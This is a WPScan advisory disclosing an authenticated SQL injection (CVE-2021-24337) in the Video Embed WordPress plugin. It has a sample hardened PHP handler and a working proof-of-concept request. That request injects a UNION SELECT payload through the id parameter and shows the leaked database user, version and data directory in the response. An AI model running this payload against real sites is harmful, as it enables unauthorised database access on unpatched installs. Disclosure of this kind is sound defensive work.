WPScan

WordPress Plugin Vulnerabilities

Video Embed <= 1.0 - Authenticated (subscriber+) SQL Injection

Description

The id GET parameter of one of the plugin's pages (reachable via forced browsing) is not sanitised, validated or escaped before being used in a SQL statement, allowing low-privilege users, such as subscribers, to perform SQL injection.
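As an added illustration (not the plugin's own code, which this advisory does not show), the anti-pattern the description refers to is shown beside a hardened handler. The function names, table name and menu slugs are assumed; the WordPress APIs used are real.

```php
<?php
// Added example: hypothetical handler names and table; not the plugin's code.

// Vulnerable pattern: $_GET['id'] is concatenated straight into the query, and
// nothing checks who is calling, so any logged-in user can reach the page by URL.
function video_embed_edit_page_vulnerable() {
    global $wpdb;
    $id  = $_GET['id'];
    $row = $wpdb->get_row( "SELECT * FROM {$wpdb->prefix}video_embed WHERE id = " . $id );
    // ... render the edit form from $row ...
}

// Hardened handler: authorise, validate, parameterise, escape on output.
function video_embed_edit_page_hardened() {
    global $wpdb;

    // 1. Authorisation: editing embeds is an admin task, so do not rely on the
    //    page being absent from the menu; require a capability subscribers lack.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'You are not allowed to access this page.', 'video-embed' ), 403 );
    }

    // 2. Validation: id must be a positive integer; anything else is rejected.
    $id = isset( $_GET['id'] ) ? absint( wp_unslash( $_GET['id'] ) ) : 0;
    if ( 0 === $id ) {
        wp_die( esc_html__( 'Invalid video id.', 'video-embed' ), 400 );
    }

    // 3. Parameterised query: %d binds an integer, so a UNION payload cannot
    //    alter the statement's structure.
    $row = $wpdb->get_row(
        $wpdb->prepare( "SELECT * FROM {$wpdb->prefix}video_embed WHERE id = %d", $id )
    );
    if ( null === $row ) {
        wp_die( esc_html__( 'Video not found.', 'video-embed' ), 404 );
    }

    // 4. Escape when rendering into the form, so stored values cannot break out.
    printf( '<input type="text" name="title" value="%s" />', esc_attr( $row->title ) );
}

// The capability passed here is what WordPress checks when admin.php?page=... is
// requested, so registering the page with 'manage_options' also blocks forced
// browsing by subscribers (the page may still be omitted from the visible menu).
add_action( 'admin_menu', function () {
    add_submenu_page(
        'video-embed', 'Edit Video', 'Edit Video',
        'manage_options', 'edit-video-embed', 'video_embed_edit_page_hardened'
    );
} );
```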

Proof of Concept

Note: The URL /wp-admin/admin.php?page=edit-video-embed&id=1 is not directly in the menu but can be accessed by forced browsing.


GET http://172.28.128.50/wp-admin/admin.php?page=edit-video-embed&id=0+union+select+1%2Ccurrent_user%28%29%2C3%2Cdatabase%28%29%2C%40%40version%2C6%[email protected]@datadir%3B HTTP/1.1
Proxy-Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-GPC: 1
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [subscriber+]
Host: 172.28.128.50


Response

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 17 Apr 2021 00:25:43 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Referrer-Policy: strict-origin-when-cross-origin
Set-Cookie: wp-settings-4=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: wp-settings-time-4=1618619143; expires=Sun, 17-Apr-2022 00:25:43 GMT; Max-Age=31536000; path=/

<...... snip ......>
				<form action="" method="post" name="video_embed" style="float: left; width: 100%;" id="video_embed">
			<table>
				<tr>
					<td>Title: </td>
					<td><input type="text" name="title" value="[email protected]" /></td>
				</tr>
				<tr style="height: 50px;">
					<td>Video from: </td>
					<td>
						<input type="radio" name="video_embed_for"  value="youtube" /> Youtube / Vimeo
						<input type="radio" name="video_embed_for"  value="videosuit" /> VideoSuit
					</td>
				</tr>
				<tr>
					<td>Youtube Embed Url: </td>
					<td>
						<input type="text" name="url" value="wp"/>
												<td><p style="font-size: 11px;">Please specify complete path(including 'http')</p></td>
					</td>
				</tr>
				<tr>
					<td>Pdf Path: </td>
					<td><input type="text" name="pdf" value="8.0.23-0ubuntu0.20.04.1" /></td>
					<td><p style="font-size: 11px;">Please specify complete path(including 'http')</p></td>
				</tr>
				<tr>
					<td>Audio Path: </td>
					<td><input type="text" name="audio" value="6" /></td>
					<td><p style="font-size: 11px;">Please specify complete path(including 'http')</p></td>
				</tr>
				<tr>
					<td>Useful Link: </td>
					<td><textarea name="useful_link">/var/lib/mysql/</textarea></td>
					<td><p style="font-size: 11px;">Please specify your html content</p></td>
				</tr>
				<tr>
					<td><input type="submit" value="Save"/>
					<td><input type="hidden" name="saved" value="1" /></td>
				</tr>
			</table>
		</form>
	</div>

<div class="clear"></div></div><!-- wpbody-content -->

<...... snip ......> 

Affects Plugins

video-embed-box
No known fix - plugin closed

References

CVE
CVE-2021-24337
URL
https://codevigilant.com/disclosure/2021/wp-plugin-video-embed-box/

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

Syed Sheeraz Ali of Code Vigilant Project

Verified

Yes

WPVDB ID
a8fd8dd4-5b5e-462e-8dae-065d5e2d003a

Timeline

Publicly Published

2021-05-19 (about 2 years ago)

Added

2021-05-19 (about 2 years ago)

Last Updated

2021-05-21 (about 2 years ago)
